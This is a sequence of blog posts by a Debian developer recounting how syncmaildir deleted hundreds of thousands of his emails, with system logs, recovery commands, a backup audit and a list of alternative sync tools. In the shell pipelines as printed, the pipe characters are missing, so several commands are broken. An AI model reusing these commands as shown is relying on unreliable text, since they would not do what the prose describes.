Conclusion As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can (and has) created significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular storage format on its file, and it seems unwise to bypass that. In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or expect. In other words, just talking with an IMAP server opens up a lot more possibilities of hosting than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently and it would have been possible for SMD to permanently corrupt significant part of my mail archives. In the end, however, the last drop was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it. In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mail box corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm. Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

29 June 2021

Antoine Beaupr : Another syncmaildir crash

So I had another major email crash with my syncmaildir setup. This time I was at least able to confirm the issue, and I still haven't lost mail thanks to backups and sheer luck (again).

The crash It is not really worth going over the crash in details, it's fairly similar to the last one: something bad happened and smd started destroying everything. The hint is that it takes a long time to do what usually takes seconds. It helps that I now have a second monitor showing logs. I still lost much more mail than the last time. I used to have "301 723 messages", according to notmuch. But then when I ran smd-pull by hand, it was telling me:
95K emails scanned
Oops. You can see notmuch happily noticing the destroyed files on the server:
jun 28 16:33:40 marcos notmuch[28532]: No new mail. Removed 65498 messages. Detected 1699 file renames.
jun 28 16:36:05 marcos notmuch[29746]: No new mail. Removed 68883 messages. Detected 2488 file renames.
jun 28 16:41:40 marcos notmuch[31972]: No new mail. Removed 118295 messages. Detected 3657 file renames.
The final count ended up being 81 042 messages, according to notmuch. A whopping 220 000 mails deleted. The interesting bit, this time around, is that I caught smd in the act of running two processes in parallel:
jun 28 16:30:09 curie systemd[2845]: Finished pull emails with syncmaildir. 
jun 28 16:30:09 curie systemd[2845]: Starting push emails with syncmaildir... 
jun 28 16:30:09 curie systemd[2845]: Starting pull emails with syncmaildir... 
So clearly that is the source of the bug.

Recovery Emergency stop on curie:
notmuch dump > notmuch.dump
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
On marcos (the server), guessed the number of messages delivered since the last backup to be 71, just looking at timestamps in the mail log. Made a list:
grep postfix/local /var/log/mail.log   tail -71 > lost-mail
Found postfix queue IDs:
sed 's/.*\]://;s/:.*//' lost-mail > qids
Turn those into message IDs, find those that are missing from the disk (had previously ran notmuch new just to be sure it's up to date):
while read qid ; do 
    grep "$qid: message-id" /var/log/mail.log
done < qids    sed 's/.*message-id=<//;s/>//'   while read msgid; do
    sudo -u anarcat notmuch count --exclude=false id:$msgid   grep -q 0 && echo $msgid
done
Copy this back on curie as missing-msgids and:
$ wc -l missing-msgids 
48 missing-msgids
$ while read msgid ; do notmuch count --exclude=false id:$msgid   grep -q 0 && echo $msgid ; done < missing-msgids
mailman.189.1624881611.23397.nodes-reseaulibre.ca@reseaulibre.ca
AnwMy7rdSpK-N-vt4AiOag@ismtpd0148p1mdw1.sendgrid.net
only two mails missing! whoohoo! Copy those back onto marcos as really-missing-msgids, and look at the full mail logs to see what they are:
~anarcat/src/koumbit-scripts/mail/postfix-trace --from-file really-missing-msgids2
I actually remembered deleting those, so no mail lost! Rebuild the list of msgids that were lost, on marcos:
while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids    sed 's/.*message-id=<//;s/>//'
Copy that on curie as lost-mail-msgids, then copy the files over in a test dir:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids   sed 's#/home/anarcat/Maildir/##'   rsync -v  --files-from=- /home/anarcat/Maildir/ shell.anarc.at:restore/Maildir-angela/
If that looks about right, on marcos:
find restore/Maildir-angela/ -type f   wc -l
... should match the number of missing mails, roughly. Copy if in the real spool:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids   sed 's#/home/anarcat/Maildir/##'   rsync -v  --files-from=- /home/anarcat/Maildir/ shell.anarc.at:Maildir/
Then on the server, notmuch new should find the new emails, and we shouldn't have any lost mail anymore:
while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids    sed 's/.*message-id=<//;s/>//'   while read msgid; do sudo -u anarcat notmuch count --exclude=false id:$msgid   grep -q 0 && echo $msgid ; done
Then, crucial moment, try to pull the new mails from the backups on curie:
anarcat@curie:~(main)$ smd-pull  -n  --show-tags -v
Found lockfile of a dead instance. Ignored.
Phase 0: handshake
Phase 1: changes detection
    5K emails scanned
   10K emails scanned
   15K emails scanned
   20K emails scanned
   25K emails scanned
   30K emails scanned
   35K emails scanned
   40K emails scanned
   45K emails scanned
   50K emails scanned
Phase 2: synchronization
Phase 3: agreement
default: smd-client@localhost: TAGS: stats::new-mails(49687), del-mails(0), bytes-received(215752279), xdelta-received(3703852)
"smd-pull  -n  --show-tags -v" took 3 mins 39 secs
This brought me back to the state after the backup plus the mails delivered during the day, which means I had to catchup with all my holiday's read emails (1440 mails!) but thankfully I made a dump of the notmuch database on curie at the start of the procedure, so this actually restored a sane state:
pv notmuch.dump   notmuch restore
Phew!

Workaround I have filed this as a bug in upstream issue 18. Considering I filed 11 issues and only 3 of those were closed, I'm not holding my breath. I nevertheless filed PR 19 in the hope that this will fix my particular issue, but I'm not even sure this is the right fix...

Fix At this point, I'm really ready to give up on SMD. It's really, really nice to be able to sync mail over SSH because I don't need to store my IMAP password on disk. But surely there are more reliable syncing mechanisms. I do not remember ever losing that much mail before. At worst, offlineimap would duplicate emails like mad, but never destroy my entire mail spool that way. As mentioned before, there are other programs that sync mail. I'm looking at:
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, see comment below
  • isync/mbsync: might be faster, I remember having trouble switching from offlineimap to this, has support for TLS client certs, running over SSH, and generally has good words from multiple Debian and notmuch people
  • getmail: just downloads email, might not be enough
  • nncp: treat the local spool as another mail server, might not be compatible with my "multiple clients" setup
  • doveadm-sync: requires dovecot on both ends, but supports using SSH to sync, will try this next, may have performance problems, see comment below
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, seems awfully complicated to setup, mentions rsmtp which is a nice name for rsendmail

23 March 2021

Antoine Beaupr : Major email crash with syncmaildir

TL:DR; lost half my mail (150,000 messages, ~6GB) last night. Cause uncertain, but possibly a combination of a dead CMOS battery, systemd OnCalendar=daily, a (locking?) bug in syncmaildir, and generally, a system too exotic and complicated.

The crash So I somehow lost half my mail:
anarcat@angela:~(main)$ du -sh Maildir/
7,9G    Maildir/
anarcat@curie:~(main)$ du -sh Maildir
14G     Maildir
anarcat@marcos:~$ du -sh Maildir
8,0G    Maildir
Those are three different machines:
  • angela: my laptop, not always on
  • curie: my workstation, mostly always on
  • marcos: my mail server, always on
Those mails are synchronized using a rather exotic system based on SSH, syncmaildir and rsendmail. The anomaly started on curie:
-- Reboot --
mar 22 16:13:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:13:00 curie smd-pull[4801]: rm: impossible de supprimer '/home/anarcat/.smd/workarea/Maildir': Le dossier n'est pas vide
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:13:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:14:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:14:00 curie smd-pull[7025]:  4091 ?        00:00:00 smd-push
mar 22 16:14:00 curie smd-pull[7025]: Already running.
mar 22 16:14:00 curie smd-pull[7025]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:14:00 curie smd-pull[7025]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 4091) run(rm /home/anarcat/.smd/lock))
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:14:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
Then it seems like smd-push (from curie) started destroying the universe for some reason:
mar 22 16:20:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:20:00 curie smd-pull[9319]:  4091 ?        00:00:00 smd-push
mar 22 16:20:00 curie smd-pull[9319]: Already running.
mar 22 16:20:00 curie smd-pull[9319]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:20:00 curie smd-pull[9319]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(ru
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:20:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:21:34 curie smd-push[4091]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:21:35 curie smd-push[9374]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:21:35 curie systemd[3199]: smd-push.service: Succeeded.
Notice the del-mails(293920) there: it is actively trying to destroy basically every email in my mail spool. Then somehow push and pull started both at once:
mar 22 16:21:35 curie systemd[3199]: Started push emails with syncmaildir.
mar 22 16:21:35 curie systemd[3199]: Starting push emails with syncmaildir...
mar 22 16:22:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:22:00 curie smd-pull[10333]:  9455 ?        00:00:00 smd-push
mar 22 16:22:00 curie smd-pull[10333]: Already running.
mar 22 16:22:00 curie smd-pull[10333]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:22:00 curie smd-pull[10333]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: Data transmission failed.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marco
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open requested file.
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:22:00 curie smd-push[9455]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
There it seems push tried to destroy the universe again: del-mails(293920). Interestingly, the push started again in parallel with the pull, right that minute:
mar 22 16:22:00 curie systemd[3199]: Starting push emails with syncmaildir...
... but didn't complete for a while, here's pull trying to start again:
mar 22 16:24:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:24:00 curie smd-pull[12051]: 10466 ?        00:00:00 smd-push
mar 22 16:24:00 curie smd-pull[12051]: Already running.
mar 22 16:24:00 curie smd-pull[12051]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:24:00 curie smd-pull[12051]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 10466) run(rm /home/anarcat/.smd/lock))
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
... and the long push finally resolving:
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: No such file or directory
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open requested file.
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie smd-push[10466]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
mar 22 16:24:00 curie systemd[3199]: Starting push emails with syncmaildir...
This pattern repeats until 16:35, when that locking issue silently recovered somehow:
mar 22 16:35:03 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:35:41 curie smd-pull[20788]: default: smd-client@localhost: TAGS: stats::new-mails(5), del-mails(1), bytes-received(21885), xdelta-received(6863398)
mar 22 16:35:42 curie smd-pull[21373]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:35:42 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:35:42 curie systemd[3199]: Started pull emails with syncmaildir.
mar 22 16:36:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:36:36 curie smd-pull[21738]: default: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(214)
mar 22 16:36:37 curie smd-pull[21816]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:36:37 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:36:37 curie systemd[3199]: Started pull emails with syncmaildir.
... notice that huge xdelta-received there, that's 7GB right there. Mysteriously, the curie mail spool survived this, possibly because smd-pull started failing again:
mar 22 16:38:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:38:00 curie smd-pull[23556]: 21887 ?        00:00:00 smd-push
mar 22 16:38:00 curie smd-pull[23556]: Already running.
mar 22 16:38:00 curie smd-pull[23556]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:38:00 curie smd-pull[23556]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 21887) run(rm /home/anarcat/.smd/lock))
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:38:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
That could have been when i got on angela to check my mail, and it was busy doing the nasty removal stuff... although the times don't match. Here is when angela came back online:
anarcat@angela:~(main)$ last
anarcat  :0           :0               Mon Mar 22 19:57   still logged in
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 19:57   still running
anarcat  :0           :0               Mon Mar 22 17:43 - 18:47  (01:03)
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 17:39   still running
Then finally the sync on curie started failing with:
mar 22 16:46:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:46:42 curie smd-pull[27455]: smd-server: ERROR: Client aborted, removing /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.new and /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.mtime.new
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: Failed to copy Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: The destination already exists but its content differs.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: To fix this problem you have two options:
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - rename Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S by hand so that Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   can be copied without replacing it.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   Executing  cd; mv -n "Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "Maildir/.koumbit/cur/1616446002.1.localhost"  should work.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - run smd-push so that your changes to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   are propagated to the other mailbox
mar 22 16:46:42 curie smd-pull[27455]: default: smd-client@localhost: TAGS: error::context(copy-message) probable-cause(concurrent-mailbox-edit) human-intervention(necessary) suggested-actions(run(mv -n "/home/anarcat/.smd/workarea/Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "/home/anarcat/.smd/workarea/Maildir/.koumbit/tmp/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S") run(smd-push default))
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:46:42 curie systemd[3199]: Failed to start pull emails with syncmaildir.
It went on like this until I found the problem. This is, presumably, a good thing because those emails were not being destroyed. On angela, things looked like this:
-- Reboot --
mar 22 17:39:29 angela systemd[1677]: Started run notmuch new at least once a day.
mar 22 17:39:29 angela systemd[1677]: Started run smd-pull regularly.
mar 22 17:40:46 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open Maildir/.tor/new/1616446842.M285912P26118.marcos,S=8860,W=8996: Maildir/.tor/new/1616446842.M285912P26118.marcos,S=886
0,W=8996: No such file or directory
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open requested file.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: Data transmission failed.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: This problem is transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: server sent ABORT or connection died
mar 22 17:43:18 angela smd-pull[3916]: default: smd-server@smd-server-anarcat: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested
-actions(retry)
mar 22 17:43:18 angela smd-pull[3916]: default: smd-client@localhost: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Failed with result 'exit-code'.
mar 22 17:43:18 angela systemd[1677]: Failed to start pull emails with syncmaildir.
mar 22 17:43:18 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:29 angela smd-pull[4847]: default: smd-client@localhost: TAGS: stats::new-mails(29), del-mails(0), bytes-received(401519), xdelta-received(38914)
mar 22 17:43:29 angela smd-pull[5600]: register: smd-client@localhost: TAGS: stats::new-mails(2), del-mails(0), bytes-received(92150), xdelta-received(471)
mar 22 17:43:29 angela systemd[1677]: smd-pull.service: Succeeded.
mar 22 17:43:29 angela systemd[1677]: Started pull emails with syncmaildir.
mar 22 17:43:29 angela systemd[1677]: Starting push emails with syncmaildir...
mar 22 17:43:32 angela smd-push[5693]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(217)
mar 22 17:43:33 angela smd-push[6575]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(219)
mar 22 17:43:33 angela systemd[1677]: smd-push.service: Succeeded.
mar 22 17:43:33 angela systemd[1677]: Started push emails with syncmaildir.
Notice how long it took to get the first error, in that first failure: it failed after 3 minutes! Presumably that's when it started deleting all that mail. And this is during pull, not push, so the error didn't come from angela.

Affected data It seems 2GB of mail from my main INBOX was destroyed. Another 2.4GB of spam (kept for training purposes) was also destroyed, along with 700MB of Sent mail. The rest is hard to figure out, because the folders are actually still there, just smaller. So I relied on ncdu to figure out the size changes. (Note that I don't really archive (or delete much of) my mail since I use notmuch, which is why the INBOX is so large...) Concretely, according to the notmuch-new.service which still runs periodically on marcos, here are the changes that happened on the server:
mar 22 16:17:12 marcos notmuch[10729]: Added 7 new messages to the database. Removed 57985 messages. Detected 1372 file renames.
mar 22 16:22:43 marcos notmuch[12826]: No new mail. Removed 143842 messages. Detected 6072 file renames.
mar 22 16:27:02 marcos notmuch[13969]: No new mail. Removed 82071 messages. Detected 1783 file renames.
mar 22 16:29:45 marcos notmuch[15079]: Added 22743 new messages to the database. Detected 1 file rename.
mar 22 16:31:48 marcos notmuch[16196]: Added 22779 new messages to the database. Removed 5 messages.
mar 22 16:33:11 marcos notmuch[17192]: Added 3711 new messages to the database.
mar 22 16:40:41 marcos notmuch[19122]: Added 74558 new messages to the database. Detected 1 file rename.
mar 22 16:43:21 marcos notmuch[20325]: Added 9061 new messages to the database. Detected 4 file renames.
mar 22 17:43:08 marcos notmuch[7420]: Added 1793 new messages to the database. Detected 6 file renames.
That is basically the entire mail spool destroyed at first (283 898 messages), and then bits and pieces of it progressively re-added (134 645 messages), somehow, so 149 253 mails were lost, presumably.

Recovery I disabled the services all over the place:
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
(Well, technically, I did that only on angela, as I thought the problem was there. Luckily, curie kept going but it seems like it was harmless.) I made a backup of the mail spool on curie:
tar cf - Maildir/   pv -s 14G   gzip -c > Maildir.tgz
Then I crossed my fingers and ran smd-push -v -s, as that was suggested by smd error codes themselves. That thankfully started restoring mail. It failed a few times on weird cases of files being duplicates, but I resolved this by following the instructions. Or mostly: I actually deleted the files instead of moving them, which made smd even unhappier (if there ever was such a thing). I had to recreate some of those files, so, lesson learned: do follow the advice smd gives you, even if it seems useless or strange. But then smd-push was humming along, uploading tens of thousands of messages, saturating the upload in the office, refilling the mail spool on the server... yaay!... ? Except... well, of course that didn't quite work: the mail spool in the office eventually started to grow beyond the size of the mail spool on the workstation. That is what smd-push eventually settled on:
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(151697), del-mails(0), bytes-received(7539147811), xdelta-received(10881198)
It recreated 151 697 emails, adding about 2000 emails to the pool, kind of from nowhere at all. On marcos, before:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,0 GiB [##########] /.notmuch
  717,3 MiB [#         ] /.Archives.2014
  498,2 MiB [#         ] /.feeds.debian-planet
  453,1 MiB [#         ] /.Archives.2012
  414,5 MiB [#         ] /.debian
  408,2 MiB [#         ] /.quoifaire
  389,8 MiB [          ] /.rapports
  356,6 MiB [          ] /.tor
  182,6 MiB [          ] /.koumbit
  179,8 MiB [          ] /tmp
   56,8 MiB [          ] /.nn
   43,0 MiB [          ] /.act-mtl
   32,6 MiB [          ] /.feeds.sysadvent
   31,7 MiB [          ] /.feeds.releases
   31,4 MiB [          ] /.Sent.2005
   26,3 MiB [          ] /.sage
   25,5 MiB [          ] /.freedombox
   24,0 MiB [          ] /.feeds.git-annex
   21,1 MiB [          ] /.Archives.2011
   19,1 MiB [          ] /.Sent.2003
   16,7 MiB [          ] /.bugtraq
   16,2 MiB [          ] /.mlug
 Total disk usage:   8,0 GiB  Apparent size:   7,6 GiB  Items: 184426
After:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,7 GiB [##########] /.notmuch
    2,7 GiB [#####     ] /.junk
    1,9 GiB [###       ] /cur
  717,3 MiB [#         ] /.Archives.2014
  659,3 MiB [#         ] /.Sent
  513,9 MiB [#         ] /.Archives.2012
  498,2 MiB [#         ] /.feeds.debian-planet
  449,6 MiB [          ] /.Archives.2015
  414,5 MiB [          ] /.debian
  408,2 MiB [          ] /.quoifaire
  389,8 MiB [          ] /.rapports
  380,8 MiB [          ] /.Archives.2013
  356,6 MiB [          ] /.tor
  261,1 MiB [          ] /.Archives.2011
  240,9 MiB [          ] /.koumbit
  183,6 MiB [          ] /.Archives.2010
  179,8 MiB [          ] /tmp
  128,4 MiB [          ] /.lists
  106,1 MiB [          ] /.inso-interne
  103,0 MiB [          ] /.github
   75,0 MiB [          ] /.nanog
   69,8 MiB [          ] /.full-disclosure
 Total disk usage:  16,2 GiB  Apparent size:  15,5 GiB  Items: 341143
That is 156 717 files more. On curie:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------------------------------------
    2,7 GiB [##########] /.junk
    2,3 GiB [########  ] /.notmuch
    1,9 GiB [######    ] /cur
  661,2 MiB [##        ] /.Archives.2014
  655,3 MiB [##        ] /.Sent
  512,0 MiB [#         ] /.Archives.2012
  447,3 MiB [#         ] /.Archives.2015
  438,5 MiB [#         ] /.feeds.debian-planet
  406,5 MiB [#         ] /.quoifaire
  383,6 MiB [#         ] /.debian
  378,6 MiB [#         ] /.Archives.2013
  303,3 MiB [#         ] /.tor
  296,0 MiB [#         ] /.rapports
  237,6 MiB [          ] /.koumbit
  233,2 MiB [          ] /.Archives.2011
  182,1 MiB [          ] /.Archives.2010
  127,0 MiB [          ] /.lists
  104,8 MiB [          ] /.inso-interne
  102,7 MiB [          ] /.register
   89,6 MiB [          ] /.github
   67,1 MiB [          ] /.full-disclosure
   66,5 MiB [          ] /.nanog
 Total disk usage:  13,3 GiB  Apparent size:  12,6 GiB  Items: 342465
Interestingly, there are more files, but less disk usage. It's possible the notmuch database there is more efficient. So maybe there's nothing to worry about. Last night's marcos backup has:
root@marcos:/home/anarcat# find /mnt/home/anarcat/Maildir   pv -l   wc -l
 341k 0:00:16 [20,4k/s] [                             <=>                                                                                                                                     ]
341040
... 341040 files, which seems about right, considering some mail was delivered during the day. An audit can be performed with hashdeep:
borg mount /media/sdb2/borg/::marcos-auto-2021-03-22 /mnt
hashdeep -c sha256 -r /mnt/home/anarcat/Maildir   pv -l -s 341k > Maildir-backup-manifest.txt
And then compared with:
hashdeep -c sha256 -k Maildir-backup-manifest.txt Maildir/
Some extra files should show up in the Maildir, and very few should actually be missing, because I shouldn't have deleted mail from the previous day the next day, or at least very few. The actual summary hashdeep gave me was:
hashdeep: Audit failed
   Input files examined: 0
  Known files expecting: 0
          Files matched: 339080
Files partially matched: 0
            Files moved: 782
        New files found: 107
  Known files not found: 106
So 106 files added, 107 deleted. Seems good enough for me... Postfix was stopped at Mar 22 21:12:59 to try and stop external events from confusing things even further. I reviewed the delivery log to see if mail that came in during the problem window disappeared:
grep 'dovecot:.*stored mail into mailbox' /var/log/mail.log  
  tail -20  
  sed 's/.*msgid=<//;s/>.*//'   
  while read msgid; do 
    notmuch count --exclude=false id:$msgid  
      grep 0 && echo $msgid missing;
  done
